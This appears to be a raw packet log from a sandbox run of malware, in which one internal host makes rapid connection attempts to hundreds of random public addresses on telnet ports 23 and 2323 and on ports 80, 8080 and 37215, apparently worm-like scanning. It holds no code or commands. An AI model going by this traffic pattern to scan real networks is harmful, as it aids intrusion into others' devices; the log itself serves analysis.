                                                      Feb 14, 2024 09:28:48.433306932 CET118423192.168.2.1572.237.62.94
                                                      Feb 14, 2024 09:28:48.433317900 CET118423192.168.2.15141.114.43.68
                                                      Feb 14, 2024 09:28:48.433319092 CET118423192.168.2.15129.3.86.76
                                                      Feb 14, 2024 09:28:48.433317900 CET11842323192.168.2.15123.34.201.38
                                                      Feb 14, 2024 09:28:48.433320999 CET118423192.168.2.1591.75.173.10
                                                      Feb 14, 2024 09:28:48.433326960 CET118423192.168.2.15155.111.104.16
                                                      Feb 14, 2024 09:28:48.433331966 CET118423192.168.2.1585.147.122.214
                                                      Feb 14, 2024 09:28:48.433339119 CET118423192.168.2.1559.18.98.152
                                                      Feb 14, 2024 09:28:48.433343887 CET118423192.168.2.15211.212.190.67
                                                      Feb 14, 2024 09:28:48.433346987 CET118423192.168.2.15177.167.69.45
                                                      Feb 14, 2024 09:28:48.433355093 CET118423192.168.2.1571.236.17.104
                                                      Feb 14, 2024 09:28:48.433355093 CET118423192.168.2.1591.35.235.199
                                                      Feb 14, 2024 09:28:48.433365107 CET11842323192.168.2.15108.170.167.80
                                                      Feb 14, 2024 09:28:48.433368921 CET118423192.168.2.1582.22.111.169
                                                      Feb 14, 2024 09:28:48.433372021 CET118423192.168.2.15198.21.50.235
                                                      Feb 14, 2024 09:28:48.433377028 CET118423192.168.2.1594.10.198.58
                                                      Feb 14, 2024 09:28:48.433379889 CET118423192.168.2.15145.213.156.210
                                                      Feb 14, 2024 09:28:48.433391094 CET118423192.168.2.1514.177.14.167
                                                      Feb 14, 2024 09:28:48.433398008 CET118423192.168.2.15165.190.36.1
                                                      Feb 14, 2024 09:28:48.433398008 CET118423192.168.2.1583.67.19.196
                                                      Feb 14, 2024 09:28:48.433410883 CET118423192.168.2.15203.254.237.74
                                                      Feb 14, 2024 09:28:48.433418989 CET118423192.168.2.1557.51.8.180
                                                      Feb 14, 2024 09:28:48.433425903 CET11842323192.168.2.15129.153.255.170
                                                      Feb 14, 2024 09:28:48.433425903 CET118423192.168.2.15203.239.247.148
                                                      Feb 14, 2024 09:28:48.433429003 CET118423192.168.2.1559.239.164.124
                                                      Feb 14, 2024 09:28:48.433429003 CET118423192.168.2.15135.249.231.182
                                                      Feb 14, 2024 09:28:48.433439016 CET118423192.168.2.1565.228.193.206
                                                      Feb 14, 2024 09:28:48.433446884 CET118423192.168.2.1557.99.112.90
                                                      Feb 14, 2024 09:28:48.433446884 CET118423192.168.2.15163.24.10.46
                                                      Feb 14, 2024 09:28:48.433455944 CET118423192.168.2.15144.36.16.20
                                                      Feb 14, 2024 09:28:48.433468103 CET118423192.168.2.15112.211.113.197
                                                      Feb 14, 2024 09:28:48.433470964 CET118423192.168.2.1595.149.97.33
                                                      Feb 14, 2024 09:28:48.433474064 CET11842323192.168.2.15206.235.214.83
                                                      Feb 14, 2024 09:28:48.433480978 CET118423192.168.2.152.6.39.176
                                                      Feb 14, 2024 09:28:48.433480978 CET118423192.168.2.15198.132.170.255
                                                      Feb 14, 2024 09:28:48.433484077 CET118423192.168.2.1539.35.173.20
                                                      Feb 14, 2024 09:28:48.433484077 CET118423192.168.2.15220.41.239.54
                                                      Feb 14, 2024 09:28:48.433490992 CET118423192.168.2.15136.202.197.243
                                                      Feb 14, 2024 09:28:48.433490992 CET118423192.168.2.1534.79.84.240
                                                      Feb 14, 2024 09:28:48.433495045 CET118423192.168.2.154.219.101.131
                                                      Feb 14, 2024 09:28:48.433495998 CET118423192.168.2.15131.151.188.223
                                                      Feb 14, 2024 09:28:48.433501959 CET118423192.168.2.15197.45.75.17
                                                      Feb 14, 2024 09:28:48.433505058 CET11842323192.168.2.1558.69.78.254
                                                      Feb 14, 2024 09:28:48.433514118 CET118423192.168.2.15198.216.32.22
                                                      Feb 14, 2024 09:28:48.433517933 CET118423192.168.2.1574.50.231.241
                                                      Feb 14, 2024 09:28:48.433518887 CET118423192.168.2.15174.201.14.88
                                                      Feb 14, 2024 09:28:48.433518887 CET118423192.168.2.1540.85.240.197
                                                      Feb 14, 2024 09:28:48.433525085 CET118423192.168.2.1557.156.3.227
                                                      Feb 14, 2024 09:28:48.433538914 CET118423192.168.2.15197.213.179.251
                                                      Feb 14, 2024 09:28:48.433540106 CET118423192.168.2.15223.212.0.38
                                                      Feb 14, 2024 09:28:48.433542013 CET118423192.168.2.15110.234.193.230
                                                      Feb 14, 2024 09:28:48.433547020 CET118423192.168.2.1566.192.116.8
                                                      Feb 14, 2024 09:28:48.433554888 CET11842323192.168.2.15189.249.182.126
                                                      Feb 14, 2024 09:28:48.433557987 CET118423192.168.2.15175.61.40.155
                                                      Feb 14, 2024 09:28:48.433568001 CET118423192.168.2.15150.149.157.123
                                                      Feb 14, 2024 09:28:48.433571100 CET118423192.168.2.15213.251.178.170
                                                      Feb 14, 2024 09:28:48.433573008 CET118423192.168.2.1512.244.0.193
                                                      Feb 14, 2024 09:28:48.433577061 CET118423192.168.2.1534.45.68.9
                                                      Feb 14, 2024 09:28:48.433582067 CET118423192.168.2.1594.229.10.254
                                                      Feb 14, 2024 09:28:48.433592081 CET118423192.168.2.1538.66.114.136
                                                      Feb 14, 2024 09:28:48.433597088 CET118423192.168.2.1531.66.1.65
                                                      Feb 14, 2024 09:28:48.433597088 CET118423192.168.2.151.202.53.168
                                                      Feb 14, 2024 09:28:48.433609962 CET11842323192.168.2.15202.4.140.116
                                                      Feb 14, 2024 09:28:48.433615923 CET118423192.168.2.15138.157.144.248
                                                      Feb 14, 2024 09:28:48.433623075 CET118423192.168.2.15111.42.56.65
                                                      Feb 14, 2024 09:28:48.433630943 CET118423192.168.2.1512.17.194.14
                                                      Feb 14, 2024 09:28:48.433636904 CET118423192.168.2.15145.185.120.17
                                                      Feb 14, 2024 09:28:48.433640003 CET118423192.168.2.1551.10.249.104
                                                      Feb 14, 2024 09:28:48.433654070 CET118423192.168.2.15206.235.147.177
                                                      Feb 14, 2024 09:28:48.433656931 CET118423192.168.2.1518.98.206.240
                                                      Feb 14, 2024 09:28:48.433664083 CET118423192.168.2.1580.251.232.154
                                                      Feb 14, 2024 09:28:48.433677912 CET118423192.168.2.15199.241.170.188
                                                      Feb 14, 2024 09:28:48.433681965 CET11842323192.168.2.152.127.197.214
                                                      Feb 14, 2024 09:28:48.433685064 CET118423192.168.2.15130.194.157.83
                                                      Feb 14, 2024 09:28:48.433685064 CET118423192.168.2.1584.133.226.188
                                                      Feb 14, 2024 09:28:48.433690071 CET118423192.168.2.1517.249.173.237
                                                      Feb 14, 2024 09:28:48.433693886 CET118423192.168.2.15213.49.223.95
                                                      Feb 14, 2024 09:28:48.433693886 CET118423192.168.2.1527.197.3.248
                                                      Feb 14, 2024 09:28:48.433696985 CET118423192.168.2.15118.39.107.17
                                                      Feb 14, 2024 09:28:48.433696985 CET118423192.168.2.15137.112.122.162
                                                      Feb 14, 2024 09:28:48.433702946 CET118423192.168.2.15220.213.137.250
                                                      Feb 14, 2024 09:28:48.433702946 CET118423192.168.2.1550.221.57.162
                                                      Feb 14, 2024 09:28:48.433707952 CET118423192.168.2.1537.135.194.203
                                                      Feb 14, 2024 09:28:48.433716059 CET118423192.168.2.15159.94.222.35
                                                      Feb 14, 2024 09:28:48.433722973 CET11842323192.168.2.15115.128.9.142
                                                      Feb 14, 2024 09:28:48.433727026 CET118423192.168.2.15123.243.180.250
                                                      Feb 14, 2024 09:28:48.433737993 CET118423192.168.2.15217.28.83.214
                                                      Feb 14, 2024 09:28:48.433737993 CET118423192.168.2.15131.203.200.57
                                                      Feb 14, 2024 09:28:48.433747053 CET118423192.168.2.15200.136.234.200
                                                      Feb 14, 2024 09:28:48.433748960 CET118423192.168.2.15183.246.177.52
                                                      Feb 14, 2024 09:28:48.433763027 CET118423192.168.2.1575.139.81.161
                                                      Feb 14, 2024 09:28:48.433763027 CET118423192.168.2.1538.148.238.132
                                                      Feb 14, 2024 09:28:48.433770895 CET11842323192.168.2.15203.188.220.155
                                                      Feb 14, 2024 09:28:48.433784008 CET118423192.168.2.1540.168.74.218
                                                      Feb 14, 2024 09:28:48.433787107 CET118423192.168.2.1587.211.126.238
                                                      Feb 14, 2024 09:28:48.433794022 CET118423192.168.2.15196.86.184.39
                                                      Feb 14, 2024 09:28:48.433798075 CET118423192.168.2.15193.216.254.12
                                                      Feb 14, 2024 09:28:48.433799982 CET118423192.168.2.1544.203.243.88
                                                      Feb 14, 2024 09:28:48.433810949 CET118423192.168.2.1542.158.200.171
                                                      Feb 14, 2024 09:28:48.433813095 CET118423192.168.2.15179.11.179.38
                                                      Feb 14, 2024 09:28:48.433816910 CET118423192.168.2.1583.57.222.128
                                                      Feb 14, 2024 09:28:48.433819056 CET118423192.168.2.15126.153.82.30
                                                      Feb 14, 2024 09:28:48.433826923 CET11842323192.168.2.15118.162.214.137
                                                      Feb 14, 2024 09:28:48.433828115 CET118423192.168.2.15167.5.47.213
                                                      Feb 14, 2024 09:28:48.433840036 CET118423192.168.2.15165.112.156.232
                                                      Feb 14, 2024 09:28:48.433840036 CET118423192.168.2.1532.208.69.253
                                                      Feb 14, 2024 09:28:48.433841944 CET118423192.168.2.15107.212.33.15
                                                      Feb 14, 2024 09:28:48.433845997 CET118423192.168.2.1525.218.246.219
                                                      Feb 14, 2024 09:28:48.433857918 CET118423192.168.2.1539.184.238.68
                                                      Feb 14, 2024 09:28:48.433857918 CET118423192.168.2.15108.73.21.1
                                                      Feb 14, 2024 09:28:48.433861017 CET118423192.168.2.15184.80.194.192
                                                      Feb 14, 2024 09:28:48.433864117 CET118423192.168.2.1573.18.5.214
                                                      Feb 14, 2024 09:28:48.433866978 CET11842323192.168.2.15154.213.146.18
                                                      Feb 14, 2024 09:28:48.433876038 CET118423192.168.2.1596.234.198.110
                                                      Feb 14, 2024 09:28:48.433891058 CET118423192.168.2.15160.138.200.139
                                                      Feb 14, 2024 09:28:48.433893919 CET118423192.168.2.15124.71.17.222
                                                      Feb 14, 2024 09:28:48.433895111 CET118423192.168.2.15141.235.59.66
                                                      Feb 14, 2024 09:28:48.433893919 CET118423192.168.2.15168.36.48.110
                                                      Feb 14, 2024 09:28:48.433900118 CET118423192.168.2.1563.12.89.178
                                                      Feb 14, 2024 09:28:48.433904886 CET118423192.168.2.15162.150.198.176
                                                      Feb 14, 2024 09:28:48.433916092 CET118423192.168.2.1560.120.136.8
                                                      Feb 14, 2024 09:28:48.433918953 CET118423192.168.2.15210.63.15.46
                                                      Feb 14, 2024 09:28:48.433933020 CET11842323192.168.2.1551.176.172.21
                                                      Feb 14, 2024 09:28:48.433933973 CET118423192.168.2.15129.174.27.72
                                                      Feb 14, 2024 09:28:48.433937073 CET118423192.168.2.15217.82.206.169
                                                      Feb 14, 2024 09:28:48.433939934 CET118423192.168.2.1568.11.225.204
                                                      Feb 14, 2024 09:28:48.433952093 CET118423192.168.2.1577.249.213.84
                                                      Feb 14, 2024 09:28:48.433952093 CET118423192.168.2.1581.225.124.23
                                                      Feb 14, 2024 09:28:48.433960915 CET118423192.168.2.15164.99.167.210
                                                      Feb 14, 2024 09:28:48.433962107 CET118423192.168.2.1575.167.176.234
                                                      Feb 14, 2024 09:28:48.433968067 CET118423192.168.2.1582.49.212.53
                                                      Feb 14, 2024 09:28:48.433974981 CET118423192.168.2.1540.173.113.245
                                                      Feb 14, 2024 09:28:48.433980942 CET11842323192.168.2.1590.171.71.131
                                                      Feb 14, 2024 09:28:48.433981895 CET118423192.168.2.15116.40.209.199
                                                      Feb 14, 2024 09:28:48.433994055 CET118423192.168.2.1551.232.48.4
                                                      Feb 14, 2024 09:28:48.433999062 CET118423192.168.2.1558.232.187.252
                                                      Feb 14, 2024 09:28:48.433999062 CET118423192.168.2.1564.229.62.123
                                                      Feb 14, 2024 09:28:48.434009075 CET118423192.168.2.1540.196.97.36
                                                      Feb 14, 2024 09:28:48.434011936 CET118423192.168.2.1577.176.1.147
                                                      Feb 14, 2024 09:28:48.434014082 CET118423192.168.2.1573.53.76.64
                                                      Feb 14, 2024 09:28:48.434014082 CET118423192.168.2.15164.169.93.2
                                                      Feb 14, 2024 09:28:48.434020996 CET118423192.168.2.1581.158.204.142
                                                      Feb 14, 2024 09:28:48.434027910 CET118423192.168.2.1543.4.91.218
                                                      Feb 14, 2024 09:28:48.434039116 CET11842323192.168.2.1577.195.149.157
                                                      Feb 14, 2024 09:28:48.434039116 CET118423192.168.2.15198.125.53.160
                                                      Feb 14, 2024 09:28:48.434039116 CET118423192.168.2.15116.6.180.219
                                                      Feb 14, 2024 09:28:48.434047937 CET118423192.168.2.1536.210.17.52
                                                      Feb 14, 2024 09:28:48.434062004 CET118423192.168.2.15147.83.67.85
                                                      Feb 14, 2024 09:28:48.434062958 CET118423192.168.2.1598.68.137.198
                                                      Feb 14, 2024 09:28:48.434066057 CET118423192.168.2.15195.7.33.187
                                                      Feb 14, 2024 09:28:48.434066057 CET118423192.168.2.15207.169.245.160
                                                      Feb 14, 2024 09:28:48.434067965 CET118423192.168.2.15223.179.184.191
                                                      Feb 14, 2024 09:28:48.434077978 CET11842323192.168.2.15182.36.15.89
                                                      Feb 14, 2024 09:28:48.434081078 CET118423192.168.2.1544.146.134.198
                                                      Feb 14, 2024 09:28:48.434086084 CET118423192.168.2.1523.153.184.225
                                                      Feb 14, 2024 09:28:48.434087038 CET118423192.168.2.15118.16.180.95
                                                      Feb 14, 2024 09:28:48.434089899 CET118423192.168.2.15108.3.199.60
                                                      Feb 14, 2024 09:28:48.434096098 CET118423192.168.2.15167.30.119.179
                                                      Feb 14, 2024 09:28:48.434103012 CET118423192.168.2.15186.185.70.135
                                                      Feb 14, 2024 09:28:48.434111118 CET118423192.168.2.15172.139.158.90
                                                      Feb 14, 2024 09:28:48.434117079 CET118423192.168.2.1574.193.249.28
                                                      Feb 14, 2024 09:28:48.434119940 CET118423192.168.2.1544.105.155.114
                                                      Feb 14, 2024 09:28:48.434129000 CET11842323192.168.2.15186.44.124.139
                                                      Feb 14, 2024 09:28:48.434134960 CET118423192.168.2.1579.243.124.163
                                                      Feb 14, 2024 09:28:48.434139013 CET118423192.168.2.159.189.90.206
                                                      Feb 14, 2024 09:28:48.434139013 CET118423192.168.2.15210.228.206.212
                                                      Feb 14, 2024 09:28:48.434149027 CET118423192.168.2.15111.100.110.86
                                                      Feb 14, 2024 09:28:48.434151888 CET118423192.168.2.1582.40.17.7
                                                      Feb 14, 2024 09:28:48.434165955 CET118423192.168.2.15155.250.181.248
                                                      Feb 14, 2024 09:28:48.434166908 CET118423192.168.2.15106.249.2.159
                                                      Feb 14, 2024 09:28:48.434165955 CET118423192.168.2.1597.213.135.106
                                                      Feb 14, 2024 09:28:48.434170961 CET118423192.168.2.1575.100.183.33
                                                      Feb 14, 2024 09:28:48.434171915 CET11842323192.168.2.1587.212.223.24
                                                      Feb 14, 2024 09:28:48.434184074 CET118423192.168.2.1527.164.178.155
                                                      Feb 14, 2024 09:28:48.434185982 CET118423192.168.2.1561.171.152.8
                                                      Feb 14, 2024 09:28:48.434195042 CET118423192.168.2.1569.237.244.28
                                                      Feb 14, 2024 09:28:48.434200048 CET118423192.168.2.15146.61.207.5
                                                      Feb 14, 2024 09:28:48.434211969 CET118423192.168.2.15115.75.165.45
                                                      Feb 14, 2024 09:28:48.434212923 CET118423192.168.2.1547.123.10.65
                                                      Feb 14, 2024 09:28:48.434214115 CET118423192.168.2.15153.78.58.131
                                                      Feb 14, 2024 09:28:48.434227943 CET118423192.168.2.1553.215.153.65
                                                      Feb 14, 2024 09:28:48.434228897 CET118423192.168.2.15131.216.124.251
                                                      Feb 14, 2024 09:28:48.434235096 CET11842323192.168.2.15223.168.159.28
                                                      Feb 14, 2024 09:28:48.434235096 CET118423192.168.2.15176.34.79.80
                                                      Feb 14, 2024 09:28:48.434237003 CET118423192.168.2.15218.227.243.165
                                                      Feb 14, 2024 09:28:48.434245110 CET118423192.168.2.15207.127.142.160
                                                      Feb 14, 2024 09:28:48.434248924 CET118423192.168.2.15152.16.53.191
                                                      Feb 14, 2024 09:28:48.434257030 CET118423192.168.2.1544.40.23.96
                                                      Feb 14, 2024 09:28:48.434268951 CET118423192.168.2.1592.204.147.192
                                                      Feb 14, 2024 09:28:48.434268951 CET118423192.168.2.15192.147.89.141
                                                      Feb 14, 2024 09:28:48.434272051 CET118423192.168.2.15148.35.158.206
                                                      Feb 14, 2024 09:28:48.434277058 CET118423192.168.2.1534.135.206.12
                                                      Feb 14, 2024 09:28:48.434277058 CET11842323192.168.2.15132.53.177.144
                                                      Feb 14, 2024 09:28:48.434282064 CET118423192.168.2.15111.250.26.164
                                                      Feb 14, 2024 09:28:48.434287071 CET118423192.168.2.1523.13.56.3
                                                      Feb 14, 2024 09:28:48.434293032 CET118423192.168.2.15130.122.96.128
                                                      Feb 14, 2024 09:28:48.434303045 CET118423192.168.2.15135.195.2.138
                                                      Feb 14, 2024 09:28:48.434310913 CET118423192.168.2.15136.103.149.105
                                                      Feb 14, 2024 09:28:48.434314013 CET118423192.168.2.15158.78.168.226
                                                      Feb 14, 2024 09:28:48.434319973 CET118423192.168.2.15211.163.189.67
                                                      Feb 14, 2024 09:28:48.434330940 CET118423192.168.2.15151.181.179.38
                                                      Feb 14, 2024 09:28:48.434336901 CET118423192.168.2.1539.6.67.33
                                                      Feb 14, 2024 09:28:48.434341908 CET11842323192.168.2.1536.88.130.112
                                                      Feb 14, 2024 09:28:48.434355021 CET118423192.168.2.15196.137.67.48
                                                      Feb 14, 2024 09:28:48.434355021 CET118423192.168.2.1585.136.67.228
                                                      Feb 14, 2024 09:28:48.434356928 CET118423192.168.2.1553.147.24.20
                                                      Feb 14, 2024 09:28:48.434357882 CET118423192.168.2.15147.238.194.91
                                                      Feb 14, 2024 09:28:48.434361935 CET118423192.168.2.15186.24.173.82
                                                      Feb 14, 2024 09:28:48.434361935 CET118423192.168.2.15190.227.205.99
                                                      Feb 14, 2024 09:28:48.434361935 CET118423192.168.2.1544.206.147.62
                                                      Feb 14, 2024 09:28:48.434381008 CET118423192.168.2.1532.211.219.164
                                                      Feb 14, 2024 09:28:48.434381008 CET118423192.168.2.15205.119.33.11
                                                      Feb 14, 2024 09:28:48.434381008 CET11842323192.168.2.15201.178.162.225
                                                      Feb 14, 2024 09:28:48.434396982 CET118423192.168.2.1590.0.157.83
                                                      Feb 14, 2024 09:28:48.434401989 CET118423192.168.2.1518.167.15.237
                                                      Feb 14, 2024 09:28:48.434401989 CET118423192.168.2.15144.70.99.227
                                                      Feb 14, 2024 09:28:48.434406042 CET118423192.168.2.1588.127.57.17
                                                      Feb 14, 2024 09:28:48.434413910 CET118423192.168.2.15164.151.117.210
                                                      Feb 14, 2024 09:28:48.434421062 CET118423192.168.2.1537.174.8.122
                                                      Feb 14, 2024 09:28:48.434427023 CET118423192.168.2.15192.140.58.195
                                                      Feb 14, 2024 09:28:48.434432983 CET118423192.168.2.15119.97.184.78
                                                      Feb 14, 2024 09:28:48.434438944 CET118423192.168.2.1559.165.247.70
                                                      Feb 14, 2024 09:28:48.434443951 CET11842323192.168.2.15209.58.68.139
                                                      Feb 14, 2024 09:28:48.434447050 CET118423192.168.2.15196.129.190.22
                                                      Feb 14, 2024 09:28:48.434452057 CET118423192.168.2.1568.178.27.5
                                                      Feb 14, 2024 09:28:48.434462070 CET118423192.168.2.15107.37.16.1
                                                      Feb 14, 2024 09:28:48.434464931 CET118423192.168.2.15142.237.121.7
                                                      Feb 14, 2024 09:28:48.434475899 CET118423192.168.2.15117.161.59.43
                                                      Feb 14, 2024 09:28:48.434484005 CET118423192.168.2.15161.22.249.105
                                                      Feb 14, 2024 09:28:48.434484005 CET118423192.168.2.1551.64.131.51
                                                      Feb 14, 2024 09:28:48.434487104 CET118423192.168.2.1551.38.187.77
                                                      Feb 14, 2024 09:28:48.434492111 CET118423192.168.2.15141.74.238.138
                                                      Feb 14, 2024 09:28:48.434494972 CET11842323192.168.2.1520.80.133.249
                                                      Feb 14, 2024 09:28:48.434505939 CET118423192.168.2.1536.162.175.87
                                                      Feb 14, 2024 09:28:48.434509993 CET118423192.168.2.1531.170.29.50
                                                      Feb 14, 2024 09:28:48.434511900 CET118423192.168.2.15168.203.83.89
                                                      Feb 14, 2024 09:28:48.434523106 CET118423192.168.2.15106.100.35.124
                                                      Feb 14, 2024 09:28:48.434524059 CET118423192.168.2.1539.243.18.220
                                                      Feb 14, 2024 09:28:48.434535027 CET118423192.168.2.1570.88.209.76
                                                      Feb 14, 2024 09:28:48.434540033 CET118423192.168.2.15121.82.32.216
                                                      Feb 14, 2024 09:28:48.434546947 CET118423192.168.2.1551.141.180.159
                                                      Feb 14, 2024 09:28:48.434554100 CET118423192.168.2.15147.188.202.202
                                                      Feb 14, 2024 09:28:48.434554100 CET11842323192.168.2.1542.131.242.167
                                                      Feb 14, 2024 09:28:48.434560061 CET118423192.168.2.15204.39.87.52
                                                      Feb 14, 2024 09:28:48.434570074 CET118423192.168.2.1578.224.97.57
                                                      Feb 14, 2024 09:28:48.434571981 CET118423192.168.2.15149.251.57.46
                                                      Feb 14, 2024 09:28:48.434580088 CET118423192.168.2.15119.56.241.192
                                                      Feb 14, 2024 09:28:48.434593916 CET118423192.168.2.15221.26.222.84
                                                      Feb 14, 2024 09:28:48.434595108 CET118423192.168.2.15216.201.101.100
                                                      Feb 14, 2024 09:28:48.434602022 CET118423192.168.2.1578.48.229.229
                                                      Feb 14, 2024 09:28:48.434607029 CET118423192.168.2.15203.253.176.113
                                                      Feb 14, 2024 09:28:48.434608936 CET118423192.168.2.1520.222.232.7
                                                      Feb 14, 2024 09:28:48.434621096 CET11842323192.168.2.15203.100.253.213
                                                      Feb 14, 2024 09:28:48.434624910 CET118423192.168.2.15176.102.14.140
                                                      Feb 14, 2024 09:28:48.434633970 CET118423192.168.2.15196.224.192.255
                                                      Feb 14, 2024 09:28:48.434637070 CET118423192.168.2.15151.38.2.202
                                                      Feb 14, 2024 09:28:48.434642076 CET118423192.168.2.1578.199.80.233
                                                      Feb 14, 2024 09:28:48.434648037 CET118423192.168.2.15121.14.139.19
                                                      Feb 14, 2024 09:28:48.434655905 CET118423192.168.2.15174.144.252.230
                                                      Feb 14, 2024 09:28:48.434662104 CET118423192.168.2.15209.8.122.21
                                                      Feb 14, 2024 09:28:48.434668064 CET118423192.168.2.1544.58.226.62
                                                      Feb 14, 2024 09:28:48.434668064 CET118423192.168.2.1583.127.35.146
                                                      Feb 14, 2024 09:28:48.434683084 CET118423192.168.2.15102.29.52.68
                                                      Feb 14, 2024 09:28:48.434684038 CET11842323192.168.2.15131.70.181.45
                                                      Feb 14, 2024 09:28:48.434684038 CET118423192.168.2.15205.132.93.239
                                                      Feb 14, 2024 09:28:48.434691906 CET118423192.168.2.15130.27.224.132
                                                      Feb 14, 2024 09:28:48.434706926 CET118423192.168.2.15125.255.193.53
                                                      Feb 14, 2024 09:28:48.434708118 CET118423192.168.2.15186.95.51.14
                                                      Feb 14, 2024 09:28:48.434714079 CET118423192.168.2.15203.150.3.201
                                                      Feb 14, 2024 09:28:48.434714079 CET118423192.168.2.15118.2.107.183
                                                      Feb 14, 2024 09:28:48.434715986 CET118423192.168.2.15199.228.200.140
                                                      Feb 14, 2024 09:28:48.434726000 CET118423192.168.2.15142.34.102.241
                                                      Feb 14, 2024 09:28:48.434731007 CET11842323192.168.2.15174.168.106.39
                                                      Feb 14, 2024 09:28:48.434737921 CET118423192.168.2.1513.99.2.230
                                                      Feb 14, 2024 09:28:48.434753895 CET118423192.168.2.15172.92.191.197
                                                      Feb 14, 2024 09:28:48.434756994 CET118423192.168.2.1577.182.119.235
                                                      Feb 14, 2024 09:28:48.443300962 CET497328080192.168.2.1531.136.153.210
                                                      Feb 14, 2024 09:28:48.456047058 CET805755295.209.129.238192.168.2.15
                                                      Feb 14, 2024 09:28:48.456118107 CET5755280192.168.2.1595.209.129.238
                                                      Feb 14, 2024 09:28:48.470326900 CET8080675262.112.138.143192.168.2.15
                                                      Feb 14, 2024 09:28:48.489475965 CET80803559694.101.49.114192.168.2.15
                                                      Feb 14, 2024 09:28:48.489554882 CET355968080192.168.2.1594.101.49.114
                                                      Feb 14, 2024 09:28:48.507303953 CET589588080192.168.2.1531.136.107.17
                                                      Feb 14, 2024 09:28:48.509198904 CET80803559694.101.49.114192.168.2.15
                                                      Feb 14, 2024 09:28:48.532409906 CET37215809641.227.22.97192.168.2.15
                                                      Feb 14, 2024 09:28:48.532757044 CET80803559694.101.49.114192.168.2.15
                                                      Feb 14, 2024 09:28:48.539305925 CET355908080192.168.2.1594.101.49.114
                                                      Feb 14, 2024 09:28:48.539328098 CET390428080192.168.2.1531.136.242.67
                                                      Feb 14, 2024 09:28:48.541959047 CET37215809641.137.138.228192.168.2.15
                                                      Feb 14, 2024 09:28:48.553653002 CET2323118493.120.7.67192.168.2.15
                                                      Feb 14, 2024 09:28:48.585736036 CET23118438.148.238.132192.168.2.15
                                                      Feb 14, 2024 09:28:48.601571083 CET23118474.50.231.241192.168.2.15
                                                      Feb 14, 2024 09:28:48.633431911 CET23118431.170.29.50192.168.2.15
                                                      Feb 14, 2024 09:28:48.650932074 CET37215809641.161.59.180192.168.2.15
                                                      Feb 14, 2024 09:28:48.654855967 CET37215809641.160.127.97192.168.2.15
                                                      Feb 14, 2024 09:28:48.663031101 CET231184137.101.89.210192.168.2.15
                                                      Feb 14, 2024 09:28:48.673883915 CET37215809641.191.228.29192.168.2.15
                                                      Feb 14, 2024 09:28:48.698379040 CET231184102.29.52.68192.168.2.15
                                                      Feb 14, 2024 09:28:48.698558092 CET118423192.168.2.15102.29.52.68
                                                      Feb 14, 2024 09:28:48.699554920 CET231184102.29.52.68192.168.2.15
                                                      Feb 14, 2024 09:28:48.701956034 CET23118460.120.136.8192.168.2.15
                                                      Feb 14, 2024 09:28:48.726007938 CET2323118436.238.45.248192.168.2.15
                                                      Feb 14, 2024 09:28:48.755685091 CET23118460.8.133.174192.168.2.15
                                                      Feb 14, 2024 09:28:48.759521008 CET80803559094.101.49.114192.168.2.15
                                                      Feb 14, 2024 09:28:48.774755955 CET80803559094.101.49.114192.168.2.15
                                                      Feb 14, 2024 09:28:48.825700998 CET231184111.42.56.65192.168.2.15
                                                      Feb 14, 2024 09:28:49.011492968 CET784080192.168.2.15112.169.76.245
                                                      Feb 14, 2024 09:28:49.011553049 CET784080192.168.2.15112.31.47.91
                                                      Feb 14, 2024 09:28:49.011620045 CET784080192.168.2.15112.186.222.222
                                                      Feb 14, 2024 09:28:49.011661053 CET784080192.168.2.15112.83.109.231
                                                      Feb 14, 2024 09:28:49.011709929 CET784080192.168.2.15112.79.138.247
                                                      Feb 14, 2024 09:28:49.011773109 CET784080192.168.2.15112.84.112.115
                                                      Feb 14, 2024 09:28:49.011835098 CET784080192.168.2.15112.221.26.128
                                                      Feb 14, 2024 09:28:49.011890888 CET784080192.168.2.15112.76.82.217
                                                      Feb 14, 2024 09:28:49.011938095 CET784080192.168.2.15112.195.172.11
                                                      Feb 14, 2024 09:28:49.011975050 CET784080192.168.2.15112.156.136.174
                                                      Feb 14, 2024 09:28:49.012015104 CET784080192.168.2.15112.50.31.243
                                                      Feb 14, 2024 09:28:49.012062073 CET784080192.168.2.15112.160.177.112
                                                      Feb 14, 2024 09:28:49.012109041 CET784080192.168.2.15112.234.174.204
                                                      Feb 14, 2024 09:28:49.012155056 CET784080192.168.2.15112.64.239.16
                                                      Feb 14, 2024 09:28:49.012203932 CET784080192.168.2.15112.213.34.6
                                                      Feb 14, 2024 09:28:49.012245893 CET784080192.168.2.15112.122.211.170
                                                      Feb 14, 2024 09:28:49.012290001 CET784080192.168.2.15112.50.223.13
                                                      Feb 14, 2024 09:28:49.012337923 CET784080192.168.2.15112.203.103.101
                                                      Feb 14, 2024 09:28:49.012376070 CET784080192.168.2.15112.19.28.180
                                                      Feb 14, 2024 09:28:49.012414932 CET784080192.168.2.15112.118.147.50
                                                      Feb 14, 2024 09:28:49.012460947 CET784080192.168.2.15112.8.174.59
                                                      Feb 14, 2024 09:28:49.012509108 CET784080192.168.2.15112.201.249.102
                                                      Feb 14, 2024 09:28:49.012550116 CET784080192.168.2.15112.167.174.182
                                                      Feb 14, 2024 09:28:49.012588978 CET784080192.168.2.15112.193.59.67
                                                      Feb 14, 2024 09:28:49.012625933 CET784080192.168.2.15112.34.55.9
                                                      Feb 14, 2024 09:28:49.012675047 CET784080192.168.2.15112.41.32.71
                                                      Feb 14, 2024 09:28:49.012739897 CET784080192.168.2.15112.44.248.178
                                                      Feb 14, 2024 09:28:49.012787104 CET784080192.168.2.15112.85.117.50
                                                      Feb 14, 2024 09:28:49.012831926 CET784080192.168.2.15112.109.231.152
                                                      Feb 14, 2024 09:28:49.012888908 CET784080192.168.2.15112.75.10.255
                                                      Feb 14, 2024 09:28:49.012957096 CET784080192.168.2.15112.63.186.193
                                                      Feb 14, 2024 09:28:49.012995958 CET784080192.168.2.15112.85.254.35
                                                      Feb 14, 2024 09:28:49.013037920 CET784080192.168.2.15112.77.20.50
                                                      Feb 14, 2024 09:28:49.013093948 CET784080192.168.2.15112.40.215.136
                                                      Feb 14, 2024 09:28:49.013159037 CET784080192.168.2.15112.36.171.245
                                                      Feb 14, 2024 09:28:49.013205051 CET784080192.168.2.15112.116.116.32
                                                      Feb 14, 2024 09:28:49.013252974 CET784080192.168.2.15112.19.72.90
                                                      Feb 14, 2024 09:28:49.013290882 CET784080192.168.2.15112.108.87.86
                                                      Feb 14, 2024 09:28:49.013338089 CET784080192.168.2.15112.5.238.238
                                                      Feb 14, 2024 09:28:49.013375998 CET784080192.168.2.15112.160.209.244
                                                      Feb 14, 2024 09:28:49.013433933 CET784080192.168.2.15112.71.176.232
